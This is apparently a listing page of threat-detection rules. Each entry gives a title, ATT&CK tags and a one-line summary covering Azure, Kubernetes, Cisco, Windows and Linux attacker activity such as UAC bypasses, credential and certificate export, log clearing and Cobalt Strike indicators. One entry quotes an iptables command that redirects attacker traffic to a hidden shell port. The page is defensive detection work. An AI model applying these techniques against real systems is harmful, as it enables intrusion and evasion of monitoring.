
    calendar Aug 12, 2024 · attack.persistence attack.t1078 attack.credential-access attack.t1552 attack.t1552.007  ·
    Share on: twitter facebook linkedin copy

    Identifies when an admission controller is executed in Azure Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.


    Read More
  • Azure Kubernetes Cluster Created or Deleted

    calendar Aug 12, 2024 · attack.impact  ·
    Share on: twitter facebook linkedin copy

    Detects when a Azure Kubernetes Cluster is created or deleted.


    Read More
  • Azure Kubernetes CronJob

    calendar Aug 12, 2024 · attack.persistence attack.t1053.003 attack.privilege-escalation attack.execution  ·
    Share on: twitter facebook linkedin copy

    Identifies when a Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.


    Read More
  • Azure Kubernetes Events Deleted

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562 attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection.


    Read More
  • Azure Kubernetes Network Policy Change

    calendar Aug 12, 2024 · attack.impact attack.credential-access  ·
    Share on: twitter facebook linkedin copy

    Identifies when a Azure Kubernetes network policy is modified or deleted.


    Read More
  • Azure Kubernetes Pods Deleted

    calendar Aug 12, 2024 · attack.impact  ·
    Share on: twitter facebook linkedin copy

    Identifies the deletion of Azure Kubernetes Pods.


    Read More
  • Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted

    calendar Aug 12, 2024 · attack.impact attack.credential-access  ·
    Share on: twitter facebook linkedin copy

    Detects the creation or patching of potential malicious RoleBinding/ClusterRoleBinding.


    Read More
  • Azure Kubernetes Secret or Config Object Access

    calendar Aug 12, 2024 · attack.impact  ·
    Share on: twitter facebook linkedin copy

    Identifies when a Kubernetes account access a sensitive objects such as configmaps or secrets.


    Read More
  • Azure Kubernetes Sensitive Role Access

    calendar Aug 12, 2024 · attack.impact  ·
    Share on: twitter facebook linkedin copy

    Identifies when ClusterRoles/Roles are being modified or deleted.


    Read More
  • Azure Kubernetes Service Account Modified or Deleted

    calendar Aug 12, 2024 · attack.impact attack.t1531  ·
    Share on: twitter facebook linkedin copy

    Identifies when a service account is modified or deleted.


    Read More
  • Azure Network Firewall Policy Modified or Deleted

    calendar Aug 12, 2024 · attack.impact attack.defense-evasion attack.t1562.007  ·
    Share on: twitter facebook linkedin copy

    Identifies when a Firewall Policy is Modified or Deleted.


    Read More
  • Azure Network Security Configuration Modified or Deleted

    calendar Aug 12, 2024 · attack.impact  ·
    Share on: twitter facebook linkedin copy

    Identifies when a network security configuration is modified or deleted.


    Read More
  • Azure New CloudShell Created

    calendar Aug 12, 2024 · attack.execution attack.t1059  ·
    Share on: twitter facebook linkedin copy

    Identifies when a new cloudshell is created inside of Azure portal.


    Read More
  • Azure Owner Removed From Application or Service Principal

    calendar Aug 12, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Identifies when a owner is was removed from a application or service principal in Azure.


    Read More
  • Azure Point-to-site VPN Modified or Deleted

    calendar Aug 12, 2024 · attack.impact  ·
    Share on: twitter facebook linkedin copy

    Identifies when a Point-to-site VPN is Modified or Deleted.


    Read More
  • Azure Service Principal Created

    calendar Aug 12, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Identifies when a service principal is created in Azure.


    Read More
  • Azure Service Principal Removed

    calendar Aug 12, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Identifies when a service principal was removed in Azure.


    Read More
  • Azure Subscription Permission Elevation Via ActivityLogs

    calendar Aug 12, 2024 · attack.initial-access attack.t1078.004  ·
    Share on: twitter facebook linkedin copy

    Detects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn't planned. This setting could allow an attacker access to Azure subscriptions in your environment.


    Read More
  • Azure Subscription Permission Elevation Via AuditLogs

    calendar Aug 12, 2024 · attack.initial-access attack.t1078  ·
    Share on: twitter facebook linkedin copy

    Detects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn't planned. This setting could allow an attacker access to Azure subscriptions in your environment.


    Read More
  • Azure Suppression Rule Created

    calendar Aug 12, 2024 · attack.impact  ·
    Share on: twitter facebook linkedin copy

    Identifies when a suppression rule is created in Azure. Adversary's could attempt this to evade detection.


    Read More
  • Azure Unusual Authentication Interruption

    calendar Aug 12, 2024 · attack.initial-access attack.t1078  ·
    Share on: twitter facebook linkedin copy

    Detects when there is a interruption in the authentication process.


    Read More
  • Azure Virtual Network Device Modified or Deleted

    calendar Aug 12, 2024 · attack.impact  ·
    Share on: twitter facebook linkedin copy

    Identifies when a virtual network device is being modified or deleted. This can be a network interface, network virtual appliance, virtual hub, or virtual router.


    Read More
  • Azure Virtual Network Modified or Deleted

    calendar Aug 12, 2024 · attack.impact  ·
    Share on: twitter facebook linkedin copy

    Identifies when a Virtual Network is modified or deleted in Azure.


    Read More
  • Azure VPN Connection Modified or Deleted

    calendar Aug 12, 2024 · attack.impact  ·
    Share on: twitter facebook linkedin copy

    Identifies when a VPN connection is modified or deleted.


    Read More
  • Backup Catalog Deleted

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1070.004  ·
    Share on: twitter facebook linkedin copy

    Detects backup catalog deletions


    Read More
  • Bad Opsec Powershell Code Artifacts

    calendar Aug 12, 2024 · attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including Cobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads that often undergo minimal changes by attackers due to bad opsec.


    Read More
  • Base64 Encoded PowerShell Command Detected

    calendar Aug 12, 2024 · attack.t1027 attack.defense-evasion attack.t1140 attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string


    Read More
  • Base64 MZ Header In CommandLine

    calendar Aug 12, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects encoded base64 MZ header in the commandline


    Read More
  • Bash Interactive Shell

    calendar Aug 12, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects execution of the bash shell with the interactive flag "-i".


    Read More
  • Binary Padding - Linux

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027.001  ·
    Share on: twitter facebook linkedin copy

    Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.


    Read More
  • Binary Padding - MacOS

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027.001  ·
    Share on: twitter facebook linkedin copy

    Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.


    Read More
  • Bitlocker Key Retrieval

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1078.004  ·
    Share on: twitter facebook linkedin copy

    Monitor and alert for Bitlocker key retrieval.


    Read More
  • BitLockerTogo.EXE Execution

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of "BitLockerToGo.EXE". BitLocker To Go is BitLocker Drive Encryption on removable data drives. This feature includes the encryption of, USB flash drives, SD cards, External hard disk drives, Other drives that are formatted by using the NTFS, FAT16, FAT32, or exFAT file system. This is a rarely used application and usage of it at all is worth investigating. Malware such as Lumma stealer has been seen using this process as a target for process hollowing.


    Read More
  • BITS Transfer Job Download From Direct IP

    calendar Aug 12, 2024 · attack.defense-evasion attack.persistence attack.t1197  ·
    Share on: twitter facebook linkedin copy

    Detects a BITS transfer job downloading file(s) from a direct IP address.


    Read More
  • BITS Transfer Job Download To Potential Suspicious Folder

    calendar Aug 12, 2024 · attack.defense-evasion attack.persistence attack.t1197  ·
    Share on: twitter facebook linkedin copy

    Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location


    Read More
  • BITS Transfer Job Downloading File Potential Suspicious Extension

    calendar Aug 12, 2024 · attack.defense-evasion attack.persistence attack.t1197  ·
    Share on: twitter facebook linkedin copy

    Detects new BITS transfer job saving local files with potential suspicious extensions


    Read More
  • Bitsadmin to Uncommon IP Server Address

    calendar Aug 12, 2024 · attack.command-and-control attack.t1071.001 attack.defense-evasion attack.persistence attack.t1197 attack.s0190  ·
    Share on: twitter facebook linkedin copy

    Detects Bitsadmin connections to IP addresses instead of FQDN names


    Read More
  • Bitsadmin to Uncommon TLD

    calendar Aug 12, 2024 · attack.command-and-control attack.t1071.001 attack.defense-evasion attack.persistence attack.t1197 attack.s0190  ·
    Share on: twitter facebook linkedin copy

    Detects Bitsadmin connections to domains with uncommon TLDs


    Read More
  • Blackbyte Ransomware Registry

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1112  ·
    Share on: twitter facebook linkedin copy

    BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption


    Read More
  • BloodHound Collection Files

    calendar Aug 12, 2024 · attack.discovery attack.t1087.001 attack.t1087.002 attack.t1482 attack.t1069.001 attack.t1069.002 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects default file names outputted by the BloodHound collection tool SharpHound


    Read More
  • Blue Mockingbird

    calendar Aug 12, 2024 · attack.execution attack.t1112 attack.t1047 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Attempts to detect system changes made by Blue Mockingbird


    Read More
  • Blue Mockingbird - Registry

    calendar Aug 12, 2024 · attack.execution attack.t1112 attack.t1047  ·
    Share on: twitter facebook linkedin copy

    Attempts to detect system changes made by Blue Mockingbird


    Read More
  • BlueSky Ransomware Artefacts

    calendar Aug 12, 2024 · attack.impact attack.t1486 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detect access to files and shares with names and extensions used by BlueSky ransomware which could indicate a current or previous encryption attempt.


    Read More
  • Boot Configuration Tampering Via Bcdedit.EXE

    calendar Aug 12, 2024 · attack.impact attack.t1490  ·
    Share on: twitter facebook linkedin copy

    Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.


    Read More
  • BPFDoor Abnormal Process ID or Lock File Accessed

    calendar Aug 12, 2024 · attack.execution attack.t1106 attack.t1059  ·
    Share on: twitter facebook linkedin copy

    detects BPFDoor .lock and .pid files access in temporary file storage facility


    Read More
  • Bpfdoor TCP Ports Redirect

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.004  ·
    Share on: twitter facebook linkedin copy

    All TCP traffic on particular port from attacker is routed to different port. ex. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392' The traffic looks like encrypted SSH communications going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule for the attacker host only.


    Read More
  • BPFtrace Unsafe Option Usage

    calendar Aug 12, 2024 · attack.execution attack.t1059.004  ·
    Share on: twitter facebook linkedin copy

    Detects the usage of the unsafe bpftrace option


    Read More
  • Browser Execution In Headless Mode

    calendar Aug 12, 2024 · attack.command-and-control attack.t1105  ·
    Share on: twitter facebook linkedin copy

    Detects execution of Chromium based browser in headless mode


    Read More
  • Browser Started with Remote Debugging

    calendar Aug 12, 2024 · attack.credential-access attack.t1185  ·
    Share on: twitter facebook linkedin copy

    Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks


    Read More
  • Bulk Deletion Changes To Privileged Account Permissions

    calendar Aug 12, 2024 · attack.persistence attack.t1098  ·
    Share on: twitter facebook linkedin copy

    Detects when a user is removed from a privileged role. Bulk changes should be investigated.


    Read More
  • Bypass UAC Using DelegateExecute

    calendar Aug 12, 2024 · attack.privilege-escalation attack.defense-evasion attack.t1548.002  ·
    Share on: twitter facebook linkedin copy

    Bypasses User Account Control using a fileless method


    Read More
  • Bypass UAC Using Event Viewer

    calendar Aug 12, 2024 · attack.persistence attack.t1547.010  ·
    Share on: twitter facebook linkedin copy

    Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification


    Read More
  • Bypass UAC Using SilentCleanup Task

    calendar Aug 12, 2024 · attack.privilege-escalation attack.defense-evasion attack.t1548.002  ·
    Share on: twitter facebook linkedin copy

    Detects the setting of the environement variable "windir" to a non default value. Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task. The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC.


    Read More
  • Bypass UAC via CMSTP

    calendar Aug 12, 2024 · attack.privilege-escalation attack.defense-evasion attack.t1548.002 attack.t1218.003  ·
    Share on: twitter facebook linkedin copy

    Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files


    Read More
  • Bypass UAC via Fodhelper.exe

    calendar Aug 12, 2024 · attack.privilege-escalation attack.t1548.002  ·
    Share on: twitter facebook linkedin copy

    Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.


    Read More
  • Bypass UAC via WSReset.exe

    calendar Aug 12, 2024 · attack.privilege-escalation attack.defense-evasion attack.t1548.002  ·
    Share on: twitter facebook linkedin copy

    Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.


    Read More
  • C# IL Code Compilation Via Ilasm.EXE

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1127  ·
    Share on: twitter facebook linkedin copy

    Detects the use of "Ilasm.EXE" in order to compile C# intermediate (IL) code to EXE or DLL.


    Read More
  • CA Policy Removed by Non Approved Actor

    calendar Aug 12, 2024 · attack.defense-evasion attack.persistence attack.t1548 attack.t1556  ·
    Share on: twitter facebook linkedin copy

    Monitor and alert on conditional access changes where non approved actor removed CA Policy.


    Read More
  • CA Policy Updated by Non Approved Actor

    calendar Aug 12, 2024 · attack.defense-evasion attack.persistence attack.t1548 attack.t1556  ·
    Share on: twitter facebook linkedin copy

    Monitor and alert on conditional access changes. Is Initiated by (actor) approved to make changes? Review Modified Properties and compare "old" vs "new" value.


    Read More
  • Capabilities Discovery - Linux

    calendar Aug 12, 2024 · attack.discovery attack.t1083  ·
    Share on: twitter facebook linkedin copy

    Detects usage of "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.


    Read More
  • Capture Credentials with Rpcping.exe

    calendar Aug 12, 2024 · attack.credential-access attack.t1003  ·
    Share on: twitter facebook linkedin copy

    Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.


    Read More
  • Cat Sudoers

    calendar Aug 12, 2024 · attack.reconnaissance attack.t1592.004  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of a cat /etc/sudoers to list all users that have sudo rights


    Read More
  • Certificate Exported From Local Certificate Store

    calendar Aug 12, 2024 · attack.credential-access attack.t1649  ·
    Share on: twitter facebook linkedin copy

    Detects when an application exports a certificate (and potentially the private key as well) from the local Windows certificate store.


    Read More
  • Certificate Exported Via Certutil.EXE

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of the certutil with the "exportPFX" flag which allows the utility to export certificates.


    Read More
  • Certificate Exported Via PowerShell

    calendar Aug 12, 2024 · attack.credential-access attack.execution attack.t1552.004 attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.


    Read More
  • Certificate Exported Via PowerShell - ScriptBlock

    calendar Aug 12, 2024 · attack.credential-access attack.t1552.004  ·
    Share on: twitter facebook linkedin copy

    Detects calls to cmdlets inside of PowerShell scripts that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.


    Read More
  • Certificate Private Key Acquired

    calendar Aug 12, 2024 · attack.credential-access attack.t1649  ·
    Share on: twitter facebook linkedin copy

    Detects when an application acquires a certificate private key


    Read More
  • Certificate Request Export to Exchange Webserver

    calendar Aug 12, 2024 · attack.persistence attack.t1505.003  ·
    Share on: twitter facebook linkedin copy

    Detects a write of an Exchange CSR to an untypical directory or with aspx name suffix which can be used to place a webshell


    Read More
  • Certificate-Based Authentication Enabled

    calendar Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.t1556  ·
    Share on: twitter facebook linkedin copy

    Detects when certificate based authentication has been enabled in an Azure Active Directory tenant.


    Read More
  • Chafer Malware URL Pattern

    calendar Aug 12, 2024 · attack.command-and-control attack.t1071.001  ·
    Share on: twitter facebook linkedin copy

    Detects HTTP request used by Chafer malware to receive data from its C2.


    Read More
  • Change Default File Association To Executable Via Assoc

    calendar Aug 12, 2024 · attack.persistence attack.t1546.001  ·
    Share on: twitter facebook linkedin copy

    Detects when a program changes the default file association of any extension to an executable. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.


    Read More
  • Change Default File Association Via Assoc

    calendar Aug 12, 2024 · attack.persistence attack.t1546.001  ·
    Share on: twitter facebook linkedin copy

    Detects file association changes using the builtin "assoc" command. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.


    Read More
  • Change PowerShell Policies to an Insecure Level

    calendar Aug 12, 2024 · attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects changing the PowerShell script execution policy to a potentially insecure level using the "-ExecutionPolicy" flag.


    Read More
  • Change PowerShell Policies to an Insecure Level - PowerShell

    calendar Aug 12, 2024 · attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects changing the PowerShell script execution policy to a potentially insecure level using the "Set-ExecutionPolicy" cmdlet.


    Read More
  • Change the Fax Dll

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1112  ·
    Share on: twitter facebook linkedin copy

    Detect possible persistence using Fax DLL load when service restart


    Read More
  • Change to Authentication Method

    calendar Aug 12, 2024 · attack.credential-access attack.t1556 attack.persistence attack.defense-evasion attack.t1098  ·
    Share on: twitter facebook linkedin copy

    Change to authentication method could be an indicator of an attacker adding an auth method to the account so they can have continued access.


    Read More
  • Change User Account Associated with the FAX Service

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1112  ·
    Share on: twitter facebook linkedin copy

    Detect change of the user account associated with the FAX service to avoid the escalation problem.


    Read More
  • Change User Agents with WebRequest

    calendar Aug 12, 2024 · attack.command-and-control attack.t1071.001  ·
    Share on: twitter facebook linkedin copy

    Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.


    Read More
  • Changes to Device Registration Policy

    calendar Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1484  ·
    Share on: twitter facebook linkedin copy

    Monitor and alert for changes to the device registration policy.


    Read More
  • Changes To PIM Settings

    calendar Aug 12, 2024 · attack.privilege-escalation attack.persistence attack.t1078.004  ·
    Share on: twitter facebook linkedin copy

    Detects when changes are made to PIM roles


    Read More
  • Changing Existing Service ImagePath Value Via Reg.EXE

    calendar Aug 12, 2024 · attack.persistence attack.t1574.011  ·
    Share on: twitter facebook linkedin copy

    Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services


    Read More
  • Chmod Suspicious Directory

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1222.002  ·
    Share on: twitter facebook linkedin copy

    Detects chmod targeting files in abnormal directory paths.


    Read More
  • Chromium Browser Headless Execution To Mockbin Like Site

    calendar Aug 12, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of a Chromium based browser process with the "headless" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data).


    Read More
  • Cisco ASA FTD Exploit CVE-2020-3452

    calendar Aug 12, 2024 · attack.t1190 attack.initial-access cve.2020-3452 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects exploitation attempts on Cisco ASA FTD systems exploiting CVE-2020-3452 with a status code of 200 (sccessful exploitation)


    Read More
  • Cisco BGP Authentication Failures

    calendar Aug 12, 2024 · attack.initial-access attack.persistence attack.privilege-escalation attack.defense-evasion attack.credential-access attack.collection attack.t1078 attack.t1110 attack.t1557  ·
    Share on: twitter facebook linkedin copy

    Detects BGP failures which may be indicative of brute force attacks to manipulate routing


    Read More
  • Cisco Clear Logs

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1070.003  ·
    Share on: twitter facebook linkedin copy

    Clear command history in network OS which is used for defense evasion


    Read More
  • Cisco Collect Data

    calendar Aug 12, 2024 · attack.discovery attack.credential-access attack.collection attack.t1087.001 attack.t1552.001 attack.t1005  ·
    Share on: twitter facebook linkedin copy

    Collect pertinent data from the configuration files


    Read More
  • Cisco Crypto Commands

    calendar Aug 12, 2024 · attack.credential-access attack.defense-evasion attack.t1553.004 attack.t1552.004  ·
    Share on: twitter facebook linkedin copy

    Show when private keys are being exported from the device, or when new certificates are installed


    Read More
  • Cisco Denial of Service

    calendar Aug 12, 2024 · attack.impact attack.t1495 attack.t1529 attack.t1565.001  ·
    Share on: twitter facebook linkedin copy

    Detect a system being shutdown or put into different boot mode


    Read More
  • Cisco Disabling Logging

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Turn off logging locally or remote


    Read More
  • Cisco Discovery

    calendar Aug 12, 2024 · attack.discovery attack.t1083 attack.t1201 attack.t1057 attack.t1018 attack.t1082 attack.t1016 attack.t1049 attack.t1033 attack.t1124  ·
    Share on: twitter facebook linkedin copy

    Find information about network devices that is not stored in config files


    Read More
  • Cisco File Deletion

    calendar Aug 12, 2024 · attack.defense-evasion attack.impact attack.t1070.004 attack.t1561.001 attack.t1561.002  ·
    Share on: twitter facebook linkedin copy

    See what files are being deleted from flash file systems


    Read More
  • Cisco LDP Authentication Failures

    calendar Aug 12, 2024 · attack.initial-access attack.persistence attack.privilege-escalation attack.defense-evasion attack.credential-access attack.collection attack.t1078 attack.t1110 attack.t1557  ·
    Share on: twitter facebook linkedin copy

    Detects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels


    Read More
  • Cisco Local Accounts

    calendar Aug 12, 2024 · attack.persistence attack.t1136.001 attack.t1098  ·
    Share on: twitter facebook linkedin copy

    Find local accounts being created or modified as well as remote authentication configurations


    Read More
  • Cisco Modify Configuration

    calendar Aug 12, 2024 · attack.persistence attack.impact attack.t1490 attack.t1505 attack.t1565.002 attack.t1053  ·
    Share on: twitter facebook linkedin copy

    Modifications to a config that will serve an adversary's impacts or persistence


    Read More
  • Cisco Show Commands Input

    calendar Aug 12, 2024 · attack.credential-access attack.t1552.003  ·
    Share on: twitter facebook linkedin copy

    See what commands are being input into the device by other people, full credentials can be in the history


    Read More
  • Cisco Sniffing

    calendar Aug 12, 2024 · attack.credential-access attack.discovery attack.t1040  ·
    Share on: twitter facebook linkedin copy

    Show when a monitor or a span/rspan is setup or modified


    Read More
  • Cisco Stage Data

    calendar Aug 12, 2024 · attack.collection attack.lateral-movement attack.command-and-control attack.exfiltration attack.t1074 attack.t1105 attack.t1560.001  ·
    Share on: twitter facebook linkedin copy

    Various protocols maybe used to put data on the device for exfil or infil


    Read More
  • Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195

    calendar Aug 12, 2024 · attack.initial-access attack.t1190 cve.2020-8193 cve.2020-8195 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects exploitation attempt against Citrix Netscaler, Application Delivery Controller (ADS) and Citrix Gateway exploiting vulnerabilities reported as CVE-2020-8193 and CVE-2020-8195


    Read More
  • Citrix Netscaler Attack CVE-2019-19781

    calendar Aug 12, 2024 · attack.initial-access attack.t1190 cve.2019-19781 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects CVE-2019-19781 exploitation attempt against Citrix Netscaler, Application Delivery Controller and Citrix Gateway Attack


    Read More
  • Classes Autorun Keys Modification

    calendar Aug 12, 2024 · attack.persistence attack.t1547.001  ·
    Share on: twitter facebook linkedin copy

    Detects modification of autostart extensibility point (ASEP) in registry.


    Read More
  • Clear Linux Logs

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1070.002  ·
    Share on: twitter facebook linkedin copy

    Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion


    Read More
  • Clearing Windows Console History

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1070 attack.t1070.003  ·
    Share on: twitter facebook linkedin copy

    Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.


    Read More
  • Cleartext Protocol Usage

    calendar Aug 12, 2024 · attack.credential-access  ·
    Share on: twitter facebook linkedin copy

    Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels. Ensure that an encryption is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access.


    Read More
  • Cleartext Protocol Usage Via Netflow

    calendar Aug 12, 2024 · attack.credential-access  ·
    Share on: twitter facebook linkedin copy

    Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels Ensure that an encryption is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access.


    Read More
  • ClickOnce Trust Prompt Tampering

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1112  ·
    Share on: twitter facebook linkedin copy

    Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet.


    Read More
  • Clipboard Collection of Image Data with Xclip Tool

    calendar Aug 12, 2024 · attack.collection attack.t1115  ·
    Share on: twitter facebook linkedin copy

    Detects attempts to collect image data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.


    Read More
  • Clipboard Collection with Xclip Tool

    calendar Aug 12, 2024 · attack.collection attack.t1115  ·
    Share on: twitter facebook linkedin copy

    Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.


    Read More
  • Clipboard Collection with Xclip Tool - Auditd

    calendar Aug 12, 2024 · attack.collection attack.t1115  ·
    Share on: twitter facebook linkedin copy

    Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.


    Read More
  • Clipboard Data Collection Via OSAScript

    calendar Aug 12, 2024 · attack.collection attack.execution attack.t1115 attack.t1059.002  ·
    Share on: twitter facebook linkedin copy

    Detects possible collection of data from the clipboard via execution of the osascript binary


    Read More
  • CLR DLL Loaded Via Office Applications

    calendar Aug 12, 2024 · attack.execution attack.t1204.002  ·
    Share on: twitter facebook linkedin copy

    Detects CLR DLL being loaded by an Office Product


    Read More
  • Cmd.EXE Missing Space Characters Execution Anomaly

    calendar Aug 12, 2024 · attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe. This could be a sign of obfuscation of a fat finger problem (typo by the developer).


    Read More
  • CMSTP Execution Process Access

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218.003 attack.execution attack.t1559.001 attack.g0069 attack.g0080 car.2019-04-001  ·
    Share on: twitter facebook linkedin copy

    Detects various indicators of Microsoft Connection Manager Profile Installer execution


    Read More
  • CMSTP Execution Process Creation

    calendar Aug 12, 2024 · attack.defense-evasion attack.execution attack.t1218.003 attack.g0069 car.2019-04-001  ·
    Share on: twitter facebook linkedin copy

    Detects various indicators of Microsoft Connection Manager Profile Installer execution


    Read More
  • CMSTP Execution Registry Event

    calendar Aug 12, 2024 · attack.defense-evasion attack.execution attack.t1218.003 attack.g0069 car.2019-04-001  ·
    Share on: twitter facebook linkedin copy

    Detects various indicators of Microsoft Connection Manager Profile Installer execution


    Read More
  • Cobalt Strike DNS Beaconing

    calendar Aug 12, 2024 · attack.command-and-control attack.t1071.004  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious DNS queries known from Cobalt Strike beacons


    Read More
  • CobaltStrike Load by Rundll32

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218.011  ·
    Share on: twitter facebook linkedin copy

    Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.


    Read More
  • CobaltStrike Named Pipe

    calendar Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1055  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of a named pipe as used by CobaltStrike


    Read More
  • CobaltStrike Named Pipe Pattern Regex

    calendar Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1055  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles


    Read More
  • CobaltStrike Named Pipe Patterns

    calendar Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1055 stp.1k  ·
